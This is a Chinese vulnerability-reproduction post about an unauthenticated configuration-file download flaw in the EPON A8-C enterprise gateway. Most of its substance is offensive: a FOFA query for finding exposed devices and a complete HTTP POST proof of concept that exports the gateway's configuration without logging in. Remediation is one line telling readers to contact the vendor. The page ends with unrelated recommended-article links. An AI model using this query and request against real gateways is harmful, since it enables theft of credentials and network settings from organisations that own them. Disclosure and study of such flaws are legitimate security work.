【漏洞复现】EPON上行A8-C政企网关未授权下载漏洞

Nx01 产品简介

EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。

Nx02 漏洞描述

EPON上行A8-C政企网关配置文件未授权下载漏洞,攻击者在未授权状态下下载配置文件,获取配置文件内敏感信息。

Nx03 产品主页

fofa-query: "ZXECS" && title=="Web user login"

Nx04 漏洞复现

POC:

复制代码
POST /sys_manager/back_huifu_mod.php?index_name= HTTP/1.1
Host: {{Hostname}}
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

submit_sys=%E5%AF%BC%E5%87%BA

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
佳児素花痴╮19 分钟前
服务器模型、网络调试工具、网络协议头分析
服务器·网络·网络协议
2401_8953665041 分钟前
ospf综合实验
网络
嵌入式阿蔡1 小时前
OTA 实战五(收官):量产落地 Checklist —— 版本号 / 防回滚 / 灰度 / 断点续传
网络·stm32·单片机·嵌入式硬件·嵌入式实时数据库
IT小白杨2 小时前
短视频多账号运营环境管理指南:指纹浏览器与云手机技术解析
大数据·经验分享·web安全·智能手机·音视频·指纹浏览器
FHAI_FHZN2 小时前
峰火智能一键紧急报警柱解决方案,打造公共区域快速响应安全防护体系
安全
我星期八休息3 小时前
扩展—DNS与ICMP
linux·服务器·网络
MC皮蛋侠客3 小时前
DNP3 系列(三):伪传输层——分段、重组与可靠传输
网络·dnp3
qq_452396234 小时前
第六篇:《运行时安全:Falco 入侵检测与异常行为监控》
安全
筝筝ba4 小时前
linux 查询当前登录的用户数量
linux·服务器·网络
TJHHH.4 小时前
文件包含漏洞
笔记·安全·文件包含